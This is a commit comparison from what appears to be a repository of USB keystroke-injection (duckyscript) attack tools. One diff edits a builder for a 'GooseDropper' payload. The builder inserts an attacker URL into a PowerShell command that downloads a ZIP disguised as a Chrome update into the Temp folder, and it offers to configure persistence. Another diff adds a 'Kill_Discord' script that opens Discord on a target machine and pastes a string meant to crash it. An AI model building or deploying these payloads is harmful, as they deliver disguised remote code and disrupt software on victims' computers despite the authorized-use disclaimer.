Compare commits
3 Commits
| Author | SHA1 | Date | |
|---|---|---|---|
| b13c5e1f38 | |||
| 578fb6b512 | |||
| 9791e1b886 |
@@ -21,9 +21,9 @@ elif [ "${DL}" == "2" ];
|
|||||||
then
|
then
|
||||||
#Get your URL
|
#Get your URL
|
||||||
read -p "Enter your URL: " SRC
|
read -p "Enter your URL: " SRC
|
||||||
|
SRC="$(echo "$SRC" | sed 's/\//\\\//g')"
|
||||||
#Add your URL to the payload
|
#Add your URL to the payload
|
||||||
sed -i "s/powershell wget YOUR_IP:1337\/Chrome_Update.zip -OutFile \$ENV:Temp\/Updater.zip/powershell \"wget \'$SRC\' -OutFile \$ENV:Temp\/Updater.zip\"/" GooseDropper.txt
|
sed -i "s/powershell wget YOUR_IP:1337\/Chrome_Update.zip -OutFile \$ENV:Temp\/Update.zip/powershell \"wget \'${SRC}\' -OutFile \$ENV:Temp\/Update.zip\"/" GooseDropper.txt
|
||||||
|
|
||||||
#Remind users to have the zip ready
|
#Remind users to have the zip ready
|
||||||
echo "Please ensure a ZIP file with proper contents and formatting is hosted at the provided URL"
|
echo "Please ensure a ZIP file with proper contents and formatting is hosted at the provided URL"
|
||||||
@@ -36,9 +36,14 @@ else
|
|||||||
|
|
||||||
fi
|
fi
|
||||||
|
|
||||||
|
read -p "Create ZIP file to deliver Desktop Goose? [Y/N]: " COMP
|
||||||
|
|
||||||
#Check if Desktop Goose is present in this directory
|
#Check if Desktop Goose is present in this directory
|
||||||
GOOSE="$(ls | grep 'Desktop Goose v0.31.zip')"
|
GOOSE="$(ls | grep 'Desktop Goose v0.31.zip')"
|
||||||
|
|
||||||
|
if [ "${COMP,,}" == "y" ];
|
||||||
|
then
|
||||||
|
|
||||||
if [ "${GOOSE}" == "" ];
|
if [ "${GOOSE}" == "" ];
|
||||||
then
|
then
|
||||||
echo "Desktop Goose is not present in this directory, download it, or move it here"
|
echo "Desktop Goose is not present in this directory, download it, or move it here"
|
||||||
@@ -52,6 +57,9 @@ else
|
|||||||
rm -rf "Desktop Goose v0.31"* Update
|
rm -rf "Desktop Goose v0.31"* Update
|
||||||
clear
|
clear
|
||||||
fi
|
fi
|
||||||
|
else
|
||||||
|
break
|
||||||
|
fi
|
||||||
|
|
||||||
read -p "Configure Persistence? [Y/N]: " PERSIST
|
read -p "Configure Persistence? [Y/N]: " PERSIST
|
||||||
|
|
||||||
|
|||||||
@@ -0,0 +1,9 @@
|
|||||||
|
Kill_Discord is a duckyscript that does exactly what the name implies.
|
||||||
|
|
||||||
|
As of April 2024 the string "http://./\<#0>: ://./<#0>" without the quotes will crash your Discord client when pasted into any message box.
|
||||||
|
|
||||||
|
This script opens Discord on the target machine and pastes that string into the first available text box.
|
||||||
|
|
||||||
|
Just to reitterate this crashes the Discord client of the SENDER, hence the need for a duckyscript.
|
||||||
|
|
||||||
|
As always, don't be a skid, and only use these scripts on devices which you are expresely authorized to use them on. I am not liable for any unauthorized usage or damage caused by the usage of this tool.
|
||||||
@@ -0,0 +1,12 @@
|
|||||||
|
DELAY 500
|
||||||
|
GUI r
|
||||||
|
DELAY 500
|
||||||
|
STRING C:\ProgramData\%USERNAME%\Discord\Update.exe --processStart Discord.exe
|
||||||
|
DELAY 500
|
||||||
|
ENTER
|
||||||
|
DELAY 2000
|
||||||
|
CTRL k
|
||||||
|
DELAY 100
|
||||||
|
ENTER
|
||||||
|
DELAY 500
|
||||||
|
STRING http://./\<#0>: ://./<#0>
|
||||||
Reference in New Issue
Block a user